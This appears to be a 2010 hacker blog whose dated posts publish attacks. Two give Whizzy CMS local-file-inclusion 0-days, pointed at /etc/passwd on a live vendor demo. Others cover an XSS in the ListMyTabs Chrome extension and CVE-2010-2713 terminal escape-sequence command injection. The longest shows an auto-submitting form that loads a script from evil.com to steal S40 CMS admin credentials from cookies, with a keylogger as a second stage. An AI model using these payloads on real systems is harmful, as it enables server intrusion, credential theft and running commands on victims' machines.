Thursday, July 29, 2010

Whizzy CMS 10.02 0-day

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: Local File Inclusion
[x] Vendor: Unverse.net
[x] Script Name: Whizzy CMS
[x] Script version: 10.02
[x] Author: Anarchy Angel
[x] Mail : anarchy[dot]ang31@gmail[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exploit:
http://site.org/?[LFI]

Ex:
http://site.org/?../../../../../../../etc/passwd

PoC on live demo:
http://www.unverse.net/?../../../../../../../../../../../../etc/passwd

This is a special DefCon 18 kick off from me! See ya there ;)

Special Tnx : lun0s, proge, sToRm, progenic, gny

Wednesday, July 28, 2010

Chrome's ListMyTabs XSS

ListMyTabs is a Google Chrome extension which, as you guessed, lists all the tabs/windows you have open by their title. It takes whatever is in the page's title tag and pushes it onto the list as HTML, which is where our XSS comes from. If you go to an evil page with something like <img src="" onerror="alert('xss')"> in its title tag and then click ListMyTabs's browser action button, you get a little alert box that says xss.

Not much of a blog post, I know, but it was fun, wasn't it?

Monday, July 26, 2010

Using XSS to pwn

In this post I will go over how to pwn a server by exploiting just XSS. This is a somewhat special circumstance, but we will go over that a little later. I will also be targeting S40 CMS for this post and giving out a few XSS 0-days in the process :)

So our goal is to get the admin username and password, but XSS is not always the best way to go about it (note I said get login details, not steal sessions). Due to some major security issues in S40 I can show you two ways to get the admin creds. If the victim checks the "remember me" box on the admin login page, S40 saves the username and password, base64 encoded, in the cookie. Which brings us to our first XSS: S40 has a handy search function that happens to be open to XSS and gives us our entry point. Let's look at our attack code:

xss_attack.html  # Remember, we have to get our victim to visit this page.
<script language="JavaScript">
function func(){
    document.go.submit();
}
</script>
<form action="http://s40.biz" name="go" method="POST">
<input type='hidden' name='gsearchfield' value='"><script src=http://evil.com/xss.js></script>'>
</form>
<script>func();</script>

The value of the hidden gsearchfield input is our injection; the rest is just our form and the JavaScript to auto-submit it. You can see it includes xss.js, our XSS payload, from evil.com. xss.js's job is to read the cookie, scan it for login details and, if it finds them, send them on to us. If not, that's OK: we just move on to the next phase and have it inject more XSS into the username ("sfu") value in the cookie.

We do this because later, when the victim goes to log in, S40 looks in the cookie for username and password data, and if it finds some it pushes it into the appropriate input fields on the login page. So if we injected a keylogger as our second-phase payload, when the admin goes to log in our payload gets run and we get the login details! There you have it: going from XSS to pwn. It just takes a perfect storm of XSS, which is sadly all too common.

Friday, July 23, 2010

Conf. Con 2010 coming up!

Conf. Con is only one day away! If it's anything like the last one it should be well worth the wait! I'll see you there xD

Sign up FREE for Conf.Con: HERE

More info on conf.con: here

Saturday, July 17, 2010

Having fun with CVE-2010-2713

Here's a fun little exploit I noticed the other day; at first I didn't have any idea wtf I was looking at. After a little research I found out that libvte is used by gnome-terminal, and that's what really got me interested: it was something I could play with without having to do a bunch of shit ;p So what's going on anyway? Well, vte reports the window or icon name back to the terminal as if it were a command being typed, and at the same time users are allowed to set the name of a window or icon, and that is where the issue lies. The one catch is that after the attack starts the victim has to hit the Enter key to execute the command the attack fed to the terminal, but this is very easy to get around. OK, let's test this baby out. Open a terminal and run this:

export PS1="\033]0;;ls\007" <= sets the window name to ;ls

Then this:

export PS1="\033]0;\a\e[21t\007" <= sends the window name to the term

Now all you have to do is hit Enter and you should get a directory listing :D There are all kinds of ways to automate this so all the victim has to do is hit Enter; you can even print a message telling the victim to hit Enter to continue >:) That's it, enjoy.

Wednesday, July 14, 2010

Whizzy CMS 10.01 0-day

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: Local File Inclusion
[x] Vendor: Unverse.net
[x] Script Name: Whizzy CMS
[x] Script version: 10.01
[x] Author: Anarchy Angel
[x] Mail : anarchy[dot]ang31@gmail[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exploit:
http://site.org/?[LFI]

Ex:
http://site.org/?../../../../../../../etc/passwd

PoC on live demo:
http://www.unverse.net/whizzydemo/?../../../../../../../../../../../../etc/passwd


Special Tnx : lun0s, proge, sToRm, progenic, gny